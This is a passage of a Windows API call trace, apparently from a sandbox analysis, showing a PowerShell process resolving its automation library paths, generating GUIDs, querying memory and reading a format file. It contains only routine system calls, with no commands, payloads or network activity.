	[0479.669] RegCloseKey (hKey=0x330) returned 0x0
	[0479.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0479.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0480.835] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xeacd039b, Data2=0xe2d, Data3=0x4edf, Data4=([0]=0x8a, [1]=0xef, [2]=0xa2, [3]=0xb1, [4]=0x35, [5]=0xea, [6]=0x9d, [7]=0x6d))) returned 0x0
	[0480.836] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xa419e545, Data2=0xa3e6, Data3=0x42aa, Data4=([0]=0xa7, [1]=0x91, [2]=0x54, [3]=0xb3, [4]=0x27, [5]=0xf, [6]=0x67, [7]=0x62))) returned 0x0
	[0480.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.869] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x5f852b3a, Data2=0x89be, Data3=0x4c72, Data4=([0]=0x9d, [1]=0x93, [2]=0x32, [3]=0xd, [4]=0x42, [5]=0x95, [6]=0x88, [7]=0x4d))) returned 0x0
	[0480.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.764] VirtualQuery (in: lpAddress=0x22b780, lpBuffer=0x22c640, dwLength=0x30 | out: lpBuffer=0x22c640*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0481.765] VirtualQuery (in: lpAddress=0x22b810, lpBuffer=0x22c6d0, dwLength=0x30 | out: lpBuffer=0x22c6d0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0481.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.767] VirtualQuery (in: lpAddress=0x22bf90, lpBuffer=0x22ce50, dwLength=0x30 | out: lpBuffer=0x22ce50*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0481.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.768] VirtualQuery (in: lpAddress=0x22bf90, lpBuffer=0x22ce50, dwLength=0x30 | out: lpBuffer=0x22ce50*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0481.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.771] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x1b9238ef, Data2=0x1d4e, Data3=0x4e11, Data4=([0]=0xb8, [1]=0xf0, [2]=0x28, [3]=0xf0, [4]=0x8, [5]=0x6e, [6]=0xe3, [7]=0x6f))) returned 0x0
	[0481.772] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc235ff76, Data2=0xe426, Data3=0x4dba, Data4=([0]=0x8f, [1]=0x74, [2]=0x34, [3]=0x2b, [4]=0x54, [5]=0x75, [6]=0xc6, [7]=0x93))) returned 0x0
	[0481.772] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xaf9e0142, Data2=0x3be5, Data3=0x4532, Data4=([0]=0x96, [1]=0xe0, [2]=0xbc, [3]=0x6f, [4]=0x94, [5]=0xbb, [6]=0x5, [7]=0x24))) returned 0x0
	[0481.774] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x1e6c3aa7, Data2=0xaa77, Data3=0x4045, Data4=([0]=0x81, [1]=0x14, [2]=0x2e, [3]=0xc7, [4]=0xa, [5]=0xf9, [6]=0xb9, [7]=0xa7))) returned 0x0
	[0481.775] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xe66c1ef5, Data2=0x9cad, Data3=0x44ed, Data4=([0]=0x8e, [1]=0xce, [2]=0x7a, [3]=0x12, [4]=0xba, [5]=0xba, [6]=0x67, [7]=0xe1))) returned 0x0
	[0481.775] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x995ddb76, Data2=0xefa2, Data3=0x410d, Data4=([0]=0x94, [1]=0x77, [2]=0x1a, [3]=0x7e, [4]=0x8c, [5]=0xd2, [6]=0xb3, [7]=0x90))) returned 0x0
	[0481.775] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x66442e84, Data2=0x8e7, Data3=0x4320, Data4=([0]=0xa8, [1]=0x4d, [2]=0xe8, [3]=0x5, [4]=0x31, [5]=0x7f, [6]=0xfd, [7]=0x51))) returned 0x0
	[0481.775] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xbb290ab4, Data2=0xd0cb, Data3=0x491e, Data4=([0]=0x81, [1]=0xf2, [2]=0x3c, [3]=0x9e, [4]=0x64, [5]=0x60, [6]=0x1c, [7]=0xc8))) returned 0x0
	[0481.775] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xa89c049a, Data2=0x255a, Data3=0x4e40, Data4=([0]=0xad, [1]=0x5e, [2]=0x9, [3]=0xee, [4]=0x9a, [5]=0xf3, [6]=0xff, [7]=0x5a))) returned 0x0
	[0481.776] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xe0e74e4, Data2=0xf41b, Data3=0x47f0, Data4=([0]=0x91, [1]=0xff, [2]=0xba, [3]=0x2a, [4]=0x73, [5]=0x53, [6]=0xf7, [7]=0xbd))) returned 0x0
	[0481.776] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x36199e95, Data2=0xf4de, Data3=0x4c33, Data4=([0]=0x95, [1]=0x6a, [2]=0xfa, [3]=0xc3, [4]=0xb2, [5]=0xfb, [6]=0x15, [7]=0x12))) returned 0x0
	[0481.776] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3520e023, Data2=0xb9ab, Data3=0x4c8c, Data4=([0]=0xb3, [1]=0x43, [2]=0x14, [3]=0x90, [4]=0x77, [5]=0x9b, [6]=0xa4, [7]=0xb7))) returned 0x0
	[0481.777] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x7e5bb2a8, Data2=0xebe, Data3=0x4cb9, Data4=([0]=0x93, [1]=0xeb, [2]=0xc2, [3]=0x2f, [4]=0x35, [5]=0x57, [6]=0x8c, [7]=0xba))) returned 0x0
	[0481.826] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x16baa89d, Data2=0xc35b, Data3=0x491a, Data4=([0]=0xa7, [1]=0x69, [2]=0x93, [3]=0xb9, [4]=0xb4, [5]=0xcd, [6]=0xcb, [7]=0xc2))) returned 0x0
	[0481.827] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc4860436, Data2=0x2d54, Data3=0x45cb, Data4=([0]=0xae, [1]=0x27, [2]=0x97, [3]=0x1a, [4]=0x36, [5]=0x18, [6]=0xdf, [7]=0xb1))) returned 0x0
	[0481.827] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x9c186687, Data2=0xfe4d, Data3=0x407f, Data4=([0]=0x80, [1]=0x77, [2]=0xfa, [3]=0xa6, [4]=0x25, [5]=0x2c, [6]=0xe3, [7]=0xe4))) returned 0x0
	[0481.828] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x4410f185, Data2=0x41d2, Data3=0x473f, Data4=([0]=0xaf, [1]=0xd3, [2]=0xd8, [3]=0x87, [4]=0x25, [5]=0x19, [6]=0x54, [7]=0x91))) returned 0x0
	[0481.828] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xd70f7f5a, Data2=0x9be1, Data3=0x4c47, Data4=([0]=0x8f, [1]=0xc1, [2]=0x54, [3]=0x8b, [4]=0x84, [5]=0x0, [6]=0x64, [7]=0x78))) returned 0x0
	[0481.828] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xdafee383, Data2=0xd55e, Data3=0x4c81, Data4=([0]=0x82, [1]=0x89, [2]=0x4, [3]=0x17, [4]=0xc6, [5]=0xc, [6]=0xc5, [7]=0x8e))) returned 0x0
	[0481.829] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xdbeba433, Data2=0xeb1, Data3=0x42b8, Data4=([0]=0x87, [1]=0xf9, [2]=0x5d, [3]=0x21, [4]=0x80, [5]=0x5d, [6]=0xb5, [7]=0x98))) returned 0x0
	[0481.829] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x5a0759f2, Data2=0xb6c7, Data3=0x4f65, Data4=([0]=0x8d, [1]=0x58, [2]=0xdb, [3]=0x2d, [4]=0xe3, [5]=0x95, [6]=0x86, [7]=0xed))) returned 0x0
	[0481.829] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x726dd60d, Data2=0xbd9a, Data3=0x40b9, Data4=([0]=0xb5, [1]=0x0, [2]=0x3b, [3]=0x25, [4]=0x1c, [5]=0x63, [6]=0xe5, [7]=0xd4))) returned 0x0
	[0481.829] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0481.830] GetFileType (hFile=0x330) returned 0x1
	[0481.830] SetErrorMode (uMode=0x1) returned 0x1
	[0481.830] GetFileType (hFile=0x330) returned 0x1
	[0481.830] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.831] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.831] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.831] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.832] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.832] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.832] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.833] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.833] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0481.834] ReadFile (in: hFile=0x330, lpBuffer=0x3051fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3051fa8*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
